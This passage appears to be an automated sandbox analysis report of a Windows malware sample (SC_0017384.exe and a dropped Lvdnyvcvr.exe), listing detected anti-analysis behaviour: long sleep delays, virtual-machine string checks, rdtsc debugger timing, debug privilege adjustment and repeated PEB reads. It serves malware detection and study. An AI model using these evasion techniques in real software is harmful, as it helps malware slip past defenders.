Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\SC_0017384.exe Window / User API: threadDelayed 2343 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9412 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 736 Jump to behavior
Source: C:\Windows\explorer.exe Window / User API: foregroundWindowGot 703 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Window / User API: threadDelayed 2522 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Window / User API: threadDelayed 2179
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9589
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9436
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\SC_0017384.exe API coverage: 9.4 %
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99812 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99700 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99593 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99484 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99372 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99265 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99151 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 99042 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 98916 Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99848 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99714 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99609 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99499 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99385 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99274 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99172 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99057 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 98953 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 98844 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99844
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99661
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99545
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99436
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99297
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99184
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 99075
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 98968
Source: C:\Users\user\AppData\Roaming\Jqtuyob\Lvdnyvcvr.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: SC_0017384.exe, 00000000.00000002.381865907.0000000001412000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
Source: explorer.exe, 00000004.00000000.386129776.000000000091F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
Source: Lvdnyvcvr.exe, 00000005.00000002.567915888.0000000005DED000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.582466322.0000000004437000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.552222750.00000000086E7000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: Lvdnyvcvr.exe, 00000009.00000002.574184145.0000000005E40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: SC_0017384.exe, 00000000.00000002.400969818.00000000068AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000003.535831998.0000000008645000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000004.00000003.533892507.000000000EFC5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551309826.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.539351486.000000000EFC7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.551825356.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.593029452.000000000EFCB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01835BA5 rdtsc 3_2_01835BA5
Enables debug privileges
Source: C:\Users\user\Desktop\SC_0017384.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\SC_0017384.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h] 3_2_0176B171
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B171 mov eax, dword ptr fs:[00000030h] 3_2_0176B171
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176C962 mov eax, dword ptr fs:[00000030h] 3_2_0176C962
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h] 3_2_0178B944
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178B944 mov eax, dword ptr fs:[00000030h] 3_2_0178B944
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179513A mov eax, dword ptr fs:[00000030h] 3_2_0179513A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179513A mov eax, dword ptr fs:[00000030h] 3_2_0179513A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov eax, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01784120 mov ecx, dword ptr fs:[00000030h] 3_2_01784120
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] 3_2_01769100
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] 3_2_01769100
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769100 mov eax, dword ptr fs:[00000030h] 3_2_01769100
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0176B1E1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0176B1E1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176B1E1 mov eax, dword ptr fs:[00000030h] 3_2_0176B1E1
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017F41E8 mov eax, dword ptr fs:[00000030h] 3_2_017F41E8
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E51BE mov eax, dword ptr fs:[00000030h] 3_2_017E51BE
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E69A6 mov eax, dword ptr fs:[00000030h] 3_2_017E69A6
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h] 3_2_017961A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017961A0 mov eax, dword ptr fs:[00000030h] 3_2_017961A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792990 mov eax, dword ptr fs:[00000030h] 3_2_01792990
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178C182 mov eax, dword ptr fs:[00000030h] 3_2_0178C182
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179A185 mov eax, dword ptr fs:[00000030h] 3_2_0179A185
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01780050 mov eax, dword ptr fs:[00000030h] 3_2_01780050
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01780050 mov eax, dword ptr fs:[00000030h] 3_2_01780050
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179002D mov eax, dword ptr fs:[00000030h] 3_2_0179002D
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177B02A mov eax, dword ptr fs:[00000030h] 3_2_0177B02A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] 3_2_017E7016
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] 3_2_017E7016
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E7016 mov eax, dword ptr fs:[00000030h] 3_2_017E7016
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01834015 mov eax, dword ptr fs:[00000030h] 3_2_01834015
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01834015 mov eax, dword ptr fs:[00000030h] 3_2_01834015
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017658EC mov eax, dword ptr fs:[00000030h] 3_2_017658EC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov ecx, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017FB8D0 mov eax, dword ptr fs:[00000030h] 3_2_017FB8D0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179F0BF mov ecx, dword ptr fs:[00000030h] 3_2_0179F0BF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h] 3_2_0179F0BF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179F0BF mov eax, dword ptr fs:[00000030h] 3_2_0179F0BF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A90AF mov eax, dword ptr fs:[00000030h] 3_2_017A90AF
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017920A0 mov eax, dword ptr fs:[00000030h] 3_2_017920A0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01822073 mov eax, dword ptr fs:[00000030h] 3_2_01822073
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769080 mov eax, dword ptr fs:[00000030h] 3_2_01769080
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01831074 mov eax, dword ptr fs:[00000030h] 3_2_01831074
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h] 3_2_017E3884
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E3884 mov eax, dword ptr fs:[00000030h] 3_2_017E3884
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181D380 mov ecx, dword ptr fs:[00000030h] 3_2_0181D380
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h] 3_2_01793B7A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01793B7A mov eax, dword ptr fs:[00000030h] 3_2_01793B7A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182138A mov eax, dword ptr fs:[00000030h] 3_2_0182138A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176DB60 mov ecx, dword ptr fs:[00000030h] 3_2_0176DB60
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01835BA5 mov eax, dword ptr fs:[00000030h] 3_2_01835BA5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176F358 mov eax, dword ptr fs:[00000030h] 3_2_0176F358
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176DB40 mov eax, dword ptr fs:[00000030h] 3_2_0176DB40
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178DBE9 mov eax, dword ptr fs:[00000030h] 3_2_0178DBE9
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182131B mov eax, dword ptr fs:[00000030h] 3_2_0182131B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017903E2 mov eax, dword ptr fs:[00000030h] 3_2_017903E2
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h] 3_2_017E53CA
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E53CA mov eax, dword ptr fs:[00000030h] 3_2_017E53CA
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] 3_2_01794BAD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] 3_2_01794BAD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794BAD mov eax, dword ptr fs:[00000030h] 3_2_01794BAD
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838B58 mov eax, dword ptr fs:[00000030h] 3_2_01838B58
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179B390 mov eax, dword ptr fs:[00000030h] 3_2_0179B390
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792397 mov eax, dword ptr fs:[00000030h] 3_2_01792397
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h] 3_2_01771B8F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01771B8F mov eax, dword ptr fs:[00000030h] 3_2_01771B8F
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A927A mov eax, dword ptr fs:[00000030h] 3_2_017A927A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017F4257 mov eax, dword ptr fs:[00000030h] 3_2_017F4257
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01769240 mov eax, dword ptr fs:[00000030h] 3_2_01769240
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h] 3_2_017A4A2C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A4A2C mov eax, dword ptr fs:[00000030h] 3_2_017A4A2C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h] 3_2_0176AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0176AA16 mov eax, dword ptr fs:[00000030h] 3_2_0176AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01783A1C mov eax, dword ptr fs:[00000030h] 3_2_01783A1C
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov ecx, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01765210 mov eax, dword ptr fs:[00000030h] 3_2_01765210
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01778A0A mov eax, dword ptr fs:[00000030h] 3_2_01778A0A
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h] 3_2_0182AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182AA16 mov eax, dword ptr fs:[00000030h] 3_2_0182AA16
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792AE4 mov eax, dword ptr fs:[00000030h] 3_2_01792AE4
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01792ACB mov eax, dword ptr fs:[00000030h] 3_2_01792ACB
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h] 3_2_0177AAB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0177AAB0 mov eax, dword ptr fs:[00000030h] 3_2_0177AAB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179FAB0 mov eax, dword ptr fs:[00000030h] 3_2_0179FAB0
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017652A5 mov eax, dword ptr fs:[00000030h] 3_2_017652A5
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0182EA55 mov eax, dword ptr fs:[00000030h] 3_2_0182EA55
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h] 3_2_0181B260
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0181B260 mov eax, dword ptr fs:[00000030h] 3_2_0181B260
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01838A62 mov eax, dword ptr fs:[00000030h] 3_2_01838A62
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h] 3_2_0179D294
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0179D294 mov eax, dword ptr fs:[00000030h] 3_2_0179D294
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h] 3_2_0178C577
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_0178C577 mov eax, dword ptr fs:[00000030h] 3_2_0178C577
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01787D50 mov eax, dword ptr fs:[00000030h] 3_2_01787D50
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018305AC mov eax, dword ptr fs:[00000030h] 3_2_018305AC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_018305AC mov eax, dword ptr fs:[00000030h] 3_2_018305AC
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017A3D43 mov eax, dword ptr fs:[00000030h] 3_2_017A3D43
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_017E3540 mov eax, dword ptr fs:[00000030h] 3_2_017E3540
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] 3_2_01794D3B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] 3_2_01794D3B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01794D3B mov eax, dword ptr fs:[00000030h] 3_2_01794D3B
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
Source: C:\Users\user\Desktop\SC_0017384.exe Code function: 3_2_01773D34 mov eax, dword ptr fs:[00000030h] 3_2_01773D34
